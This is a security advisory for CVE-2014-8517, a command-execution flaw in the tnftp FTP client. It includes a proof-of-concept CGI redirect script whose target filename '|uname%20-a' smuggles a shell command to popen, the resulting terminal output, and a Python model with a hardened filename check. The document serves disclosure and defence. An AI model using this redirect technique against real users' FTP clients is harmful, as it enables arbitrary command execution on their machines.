Linux FTP exploitation: tnftp FTP client arbitrary command execution vulnerability (CVE-2014-8517)

Published: 2014-10-29

Updated: 2014-10-30

Affected systems:

NetBSD tnftp

Description:

CVE(CAN) ID: CVE-2014-8517

tnftp is the widely used NetBSD FTP client.

tnftp contains a security vulnerability that allows an attacker to execute arbitrary commands. It affects several Linux and BSD systems (Fedora, Debian, NetBSD, FreeBSD, OpenBSD) as well as Apple OS X Yosemite 10.10.

When the victim runs "ftp http://server/path/file.txt" without using the "-o" option to name the output file, a malicious server can make tnftp execute arbitrary commands.

Test method:

Warning

The following program (method) may be offensive in nature and is provided only for security research and teaching. Users proceed at their own risk!

Jared Mcneill () provided the following test method:

If you do "ftp http://server/path/file.txt" and don't specify an output filename with -o, the ftp program can be tricked into executing arbitrary commands.

The FTP client will follow HTTP redirects, and uses the part of the path after the last / from the last resource it accesses as the output filename (as long as -o is not specified).

After it resolves the output filename, it checks to see if the output filename begins with a "|", and if so, passes the rest to popen(3): http://nxr.netbsd.org/xref/src/usr.bin/ftp/fetch.c#1156

Here's a simple CGI script that causes ftp to execute "uname -a"; the issue is present on both NetBSD 7.99.1 and OSX 10.10:

a20$ pwd
/var/www/cgi-bin
a20$ ls -l
total 4
-rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
-rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
a20$ cat redirect
#!/bin/sh
echo 'Status: 302 Found'
echo 'Content-Type: text/html'
echo 'Connection: keep-alive'
echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
echo
a20$

a20$ ftp http://localhost/cgi-bin/redirect
Trying ::1:80 ...
ftp: Can't connect to `::1:80': Connection refused
Trying 127.0.0.1:80 ...
Requesting http://localhost/cgi-bin/redirect
Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
Requesting http://192.168.2.19/cgi-bin/|uname%20-a
32      101.46 KiB/s
32 bytes retrieved in 00:00 (78.51 KiB/s)
NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36 ADT 2014 Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIEBOARD evbarm
a20$
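The filename rule described above (last path component of the final redirect target, handed to popen(3) when it starts with "|") is easy to model, and the model shows exactly where a client must refuse a server-chosen name. The following Python is an added illustration, not tnftp's own code; the redirect table and all function names are constructed for this example, and it assumes the client percent-decodes the name, as the transcript implies ("uname%20-a" ran as "uname -a").

```python
"""Model of tnftp's output-filename choice for HTTP fetches (CVE-2014-8517).
Added illustration, not tnftp's own code; all names here are hypothetical."""
from urllib.parse import unquote, urlsplit

# Constructed redirect table standing in for the CGI 'redirect' script above.
REDIRECTS = {
    "http://localhost/cgi-bin/redirect": "http://192.168.2.19/cgi-bin/|uname%20-a",
}


def follow_redirects(start_url, redirect_map, max_hops=10):
    """Return the URL of the last resource a client chasing 302s would fetch."""
    url = start_url
    for _ in range(max_hops):
        nxt = redirect_map.get(url)
        if nxt is None:
            return url
        url = nxt
    raise RuntimeError("too many redirects")


def derive_output_name(final_url):
    """The vulnerable rule: the percent-decoded text after the last '/' of the
    final URL.  Decoding is assumed here because 'uname%20-a' ran as 'uname -a'
    in the transcript above."""
    return unquote(urlsplit(final_url).path.rsplit("/", 1)[-1])


def is_unsafe_output_name(name):
    """Names a client must never open blindly: a leading '|' would reach
    popen(3); empty, '.', '..' or slash-containing names escape the cwd."""
    return name == "" or name.startswith("|") or "/" in name or name in (".", "..")


def safe_output_name(final_url):
    """Hardened derivation: same rule, but refuse a dangerous server-chosen name
    instead of handing it to popen(3) or fopen(3)."""
    name = derive_output_name(final_url)
    if is_unsafe_output_name(name):
        raise ValueError(f"refusing server-chosen output name {name!r}; use -o")
    return name


if __name__ == "__main__":
    final = follow_redirects("http://localhost/cgi-bin/redirect", REDIRECTS)
    print("final URL: ", final)
    print("vulnerable:", derive_output_name(final))  # '|uname -a' would hit popen
    try:
        print("hardened:  ", safe_output_name(final))
    except ValueError as err:
        print("hardened:  ", err)
```

The practical mitigation for users, until a patched client is installed, is the one the advisory names: always pass -o so the output name never comes from the server.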

Recommendation:

Vendor patch:

NetBSD

------

The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's homepage for the latest version.
